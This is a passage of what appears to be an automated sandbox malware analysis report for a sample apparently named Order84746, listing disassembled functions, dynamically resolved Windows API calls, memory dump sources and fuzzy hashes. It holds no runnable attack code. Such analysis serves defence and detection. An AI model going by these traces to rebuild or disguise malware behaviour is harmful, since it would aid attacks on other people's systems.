                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: MessageSend$Window
                          • String ID: SysMonthCal32
                          • API String ID: 2326795674-1439706946
                          • Opcode ID: a221bf9637b31dd5587c7a8d17eabffacf89719f7c460af9145ca5e53ac1f9d9
                          • Instruction ID: 01149367989fa752f6900332523d880d91697611c4a00084f0109cb49822bf22
                          • Opcode Fuzzy Hash: a221bf9637b31dd5587c7a8d17eabffacf89719f7c460af9145ca5e53ac1f9d9
                          • Instruction Fuzzy Hash: 0A21D132554218ABDF118FA4CC42FEA3B79FF4C714F110214FA55AB1D0D6B5AC51DB90
                          Function 0094A88A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON
                          Download Yara Rule
                          APIs
                          • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 0094A941
                          • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 0094A94F
                          • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0094A956
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: MessageSend$DestroyWindow
                          • String ID: msctls_updown32
                          • API String ID: 4014797782-2298589950
                          • Opcode ID: d03774e665eaa2baf3a98afb4c08dc54fe48926379a4acfa7f3ce4374f4db5ac
                          • Instruction ID: 6e018c9b78699c3f448ce5ec5667af8e8718e8c4269efd4b07bdf7dbf78887c7
                          • Opcode Fuzzy Hash: d03774e665eaa2baf3a98afb4c08dc54fe48926379a4acfa7f3ce4374f4db5ac
                          • Instruction Fuzzy Hash: 39218EB5600209AFDB14DF28CC81D6B37ADEF5A3A8B050059FA149B3A1DA71EC119B61
                          Function 009499A5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                          Download Yara Rule
                          APIs
                          • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00949A30
                          • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00949A40
                          • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00949A65
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: MessageSend$MoveWindow
                          • String ID: Listbox
                          • API String ID: 3315199576-2633736733
                          • Opcode ID: 9b7313fecf422a6247d374a93d1b60dfdfde669ce25e5e400cdce96251e8917a
                          • Instruction ID: 95a2f7ea6aa7fd2c39fe63040d19e42dea64a0ab43df0d35d52f55a813ac65af
                          • Opcode Fuzzy Hash: 9b7313fecf422a6247d374a93d1b60dfdfde669ce25e5e400cdce96251e8917a
                          • Instruction Fuzzy Hash: 7521CF32611118BFDF228F54CC85FBF3BAEEF89764F018128F9549B1A0C6719C5297A0
                          Function 0094A409 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
                          Download Yara Rule
                          APIs
                          • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 0094A46D
                          • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 0094A482
                          • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 0094A48F
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: MessageSend
                          • String ID: msctls_trackbar32
                          • API String ID: 3850602802-1010561917
                          • Opcode ID: c444fbb23312ab37b34e8592201430501ee1ad6fd5ca156e551d4ecd9e737707
                          • Instruction ID: 90c2ab91e0109e5ec3a944d6f634441cf5ddf7800d66378b3ea7edc176bbd5b5
                          • Opcode Fuzzy Hash: c444fbb23312ab37b34e8592201430501ee1ad6fd5ca156e551d4ecd9e737707
                          • Instruction Fuzzy Hash: AD11E371250208BEEF245F75CC49FAB3B6DFF89758F014218FA55A60E1D2B2E811DB20
                          Function 00902287 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize), ref: 009022A1
                          • GetProcAddress.KERNEL32(00000000), ref: 009022A8
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: AddressLibraryLoadProc
                          • String ID: RoInitialize$combase.dll
                          • API String ID: 2574300362-340411864
                          • Opcode ID: c0da2d12d2e4fe953cfca4c0d5f88a6c1ee6e865bfd14167265a297b6b56a1a6
                          • Instruction ID: 377e3de72998b702cb32e548daca342b3483b57953e8006c725bf67dc0d58230
                          • Opcode Fuzzy Hash: c0da2d12d2e4fe953cfca4c0d5f88a6c1ee6e865bfd14167265a297b6b56a1a6
                          • Instruction Fuzzy Hash: A4E01A74ABD300ABDB905FB5EC4DB543669EB82706F114024F122D60E0CBF44041FF89
                          Function 0090235C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00902276), ref: 00902376
                          • GetProcAddress.KERNEL32(00000000), ref: 0090237D
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: AddressLibraryLoadProc
                          • String ID: RoUninitialize$combase.dll
                          • API String ID: 2574300362-2819208100
                          • Opcode ID: 26e45621a0755cccc2fb14a545cee7741127afae7b4b0052ab47a4e670d5bb8e
                          • Instruction ID: 2b1ae3bb226363546fc053d189cf99c6a8b3f752f937e9f7a9bf0b0ab471ef62
                          • Opcode Fuzzy Hash: 26e45621a0755cccc2fb14a545cee7741127afae7b4b0052ab47a4e670d5bb8e
                          • Instruction Fuzzy Hash: 6DE0B6B0B6E300AFDB205F61ED0DB543A68BB87B06F110414F11AD20B0CBBA5410EA94
                          Function 0095AC59 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: LocalTime__swprintf
                          • String ID: %.3d$WIN_XPe
                          • API String ID: 2070861257-2409531811
                          • Opcode ID: 265e133dd56932ae4676c84f1073a1455f70dcefb8b20f7ef733e647b6ec404f
                          • Instruction ID: 738d0c016de0a9b3cccb89c412de1e780ed67054e9e6d6dc09039395d9667728
                          • Opcode Fuzzy Hash: 265e133dd56932ae4676c84f1073a1455f70dcefb8b20f7ef733e647b6ec404f
                          • Instruction Fuzzy Hash: D8E0127180561CDBCB11D791CD05DF973BCA704742F504992FD56E1004D6399B88AB26
                          Function 008FE01E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                          Download Yara Rule
                          APIs
                          • LoadLibraryA.KERNEL32(kernel32.dll,?,008FE014,74DF0AE0,008FDEF1,0097DC38,?,?), ref: 008FE02C
                          • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 008FE03E
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: AddressLibraryLoadProc
                          • String ID: GetNativeSystemInfo$kernel32.dll
                          • API String ID: 2574300362-192647395
                          • Opcode ID: d1e849830e5df739977c6eb3c1a8c10e36066b184864607cfd56a147ccbafc3e
                          • Instruction ID: 467ccdb5fb48ca5048d786c25759b133c225ec4db672c58448e3dd0066a871f8
                          • Opcode Fuzzy Hash: d1e849830e5df739977c6eb3c1a8c10e36066b184864607cfd56a147ccbafc3e
                          • Instruction Fuzzy Hash: D0D0A73091AB12EFCB354FB5EC4862276D4FB41304F19441DE491D2560DBF4C8808650
                          Function 008E42F6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                          Download Yara Rule
                          APIs
                          • LoadLibraryA.KERNEL32(kernel32.dll,00000000,008E42EC,?,008E42AA,?), ref: 008E4304
                          • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 008E4316
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: AddressLibraryLoadProc
                          • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                          • API String ID: 2574300362-1355242751
                          • Opcode ID: 96d16a6b03aeecf598b702bb9c7cdd580d286ac314051a483d40bd42fcea4f6f
                          • Instruction ID: a7b05b200559a22fb72337297baf79f433f986f196a89b4ff2dd57e34b210e05
                          • Opcode Fuzzy Hash: 96d16a6b03aeecf598b702bb9c7cdd580d286ac314051a483d40bd42fcea4f6f
                          • Instruction Fuzzy Hash: 7ED0A734918712AFCB244F66E80CA0176D4FB06305B01841DE456D2364D7F0C8808610
                          Function 00942205 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                          Download Yara Rule
                          APIs
                          • LoadLibraryA.KERNEL32(kernel32.dll,?,009421FB,?,009423EF), ref: 00942213
                          • GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 00942225
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: AddressLibraryLoadProc
                          • String ID: GetProcessId$kernel32.dll
                          • API String ID: 2574300362-399901964
                          • Opcode ID: ee13e215845259d13dac4568f9b94f7bc7a8c1ab9b2990ce6af8480aac2cb70d
                          • Instruction ID: 5e0217e9ae4a9f38fb42bf85d982a741737c8671c6f6f7245680bf8426675474
                          • Opcode Fuzzy Hash: ee13e215845259d13dac4568f9b94f7bc7a8c1ab9b2990ce6af8480aac2cb70d
                          • Instruction Fuzzy Hash: D9D0A7349187129FCB294F75F808A0177D8FB0A304B01441DF861E2150D7F0D880D660
                          Function 008E434B Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                          Download Yara Rule
                          APIs
                          • LoadLibraryA.KERNEL32(kernel32.dll,008E41BB,008E4341,?,008E422F,?,008E41BB,?,?,?,?,008E39FE,?,00000001), ref: 008E4359
                          • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 008E436B
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: AddressLibraryLoadProc
                          • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                          • API String ID: 2574300362-3689287502
                          • Opcode ID: 6177cb5a6920df831433509a2af699a7fa7a0c400a138f6f39587dc26a1606a2
                          • Instruction ID: 8678cffb719472f809bf67005547b50b0685369ca6e96a938290b5d95c056d30
                          • Opcode Fuzzy Hash: 6177cb5a6920df831433509a2af699a7fa7a0c400a138f6f39587dc26a1606a2
                          • Instruction Fuzzy Hash: B4D0A730918712AFCB244F77E80CA0276D4FB1671DB11851DE895D2250D7F0D8808610
                          Function 00920539 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                          Download Yara Rule
                          APIs
                          • LoadLibraryA.KERNEL32(oleaut32.dll,?,0092051D,?,009205FE), ref: 00920547
                          • GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 00920559
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: AddressLibraryLoadProc
                          • String ID: RegisterTypeLibForUser$oleaut32.dll
                          • API String ID: 2574300362-1071820185
                          • Opcode ID: b65ba6d115340275fe72a426d1dee2e309a60ee4dfa4937d80f3c6d7436b10b8
                          • Instruction ID: 072bac6228bd63a7b0c1495512e115ebafc102997c48b5da0b182c7d956e5536
                          • Opcode Fuzzy Hash: b65ba6d115340275fe72a426d1dee2e309a60ee4dfa4937d80f3c6d7436b10b8
                          • Instruction Fuzzy Hash: 84D0A73091D722AFCB208F26F808A0176E8AB41305B11C41DF496D2155D6F0C8808A50
                          Function 00920564 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                          Download Yara Rule
                          APIs
                          • LoadLibraryA.KERNEL32(oleaut32.dll,00000000,0092052F,?,009206D7), ref: 00920572
                          • GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 00920584
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: AddressLibraryLoadProc
                          • String ID: UnRegisterTypeLibForUser$oleaut32.dll
                          • API String ID: 2574300362-1587604923
                          • Opcode ID: cb3f05221d0184b20f97544a74c5b39f4eebf031c53351a74d904b3dd0a6f24a
                          • Instruction ID: a71c79fc019dde7162b9ac3fb6dc5abf50bd885c500532c59d1f362e93ff2a21
                          • Opcode Fuzzy Hash: cb3f05221d0184b20f97544a74c5b39f4eebf031c53351a74d904b3dd0a6f24a
                          • Instruction Fuzzy Hash: 9CD0A730919322AFCB205F36F809F027BECAF45304B11851DF855D2154D7F0C4C08A60
                          Function 0093ECC8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                          Download Yara Rule
                          APIs
                          • LoadLibraryA.KERNEL32(kernel32.dll,?,0093ECBE,?,0093EBBB), ref: 0093ECD6
                          • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0093ECE8
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: AddressLibraryLoadProc
                          • String ID: GetSystemWow64DirectoryW$kernel32.dll
                          • API String ID: 2574300362-1816364905
                          • Opcode ID: e19f686058b3116cc0dc2db5e0e8473da95ba51636079d62ee14d657fb45a34b
                          • Instruction ID: 892e28b13ea7547c67e8203d775d2a7f8bd396ca6d4ee6f39b827c0d36bb9959
                          • Opcode Fuzzy Hash: e19f686058b3116cc0dc2db5e0e8473da95ba51636079d62ee14d657fb45a34b
                          • Instruction Fuzzy Hash: 17D0A730918723AFCF245F65E84860677E8EB01705F01841DF895D2190DBF0C8819B10
                          Function 0093BADD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                          Download Yara Rule
                          APIs
                          • LoadLibraryA.KERNEL32(kernel32.dll,00000000,0093BAD3,00000001,0093B6EE,?,0097DC00), ref: 0093BAEB
                          • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 0093BAFD
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: AddressLibraryLoadProc
                          • String ID: GetModuleHandleExW$kernel32.dll
                          • API String ID: 2574300362-199464113
                          • Opcode ID: bce2cb678f3ba5e42669bb79bd9a83dd1117b0f22bc48377952ce78e28080c6d
                          • Instruction ID: f6bffa9870f6eb106ff1e4980e8751f921fd1efe9af9d225419ca659c9dd1674
                          • Opcode Fuzzy Hash: bce2cb678f3ba5e42669bb79bd9a83dd1117b0f22bc48377952ce78e28080c6d
                          • Instruction Fuzzy Hash: DED0A730D187129FCB345F66E848B11B6E8AB01304F01441DE953D2154DBF0C880CA10
                          Function 00943BDB Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                          Download Yara Rule
                          APIs
                          • LoadLibraryA.KERNEL32(advapi32.dll,?,00943BD1,?,00943E06), ref: 00943BE9
                          • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00943BFB
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
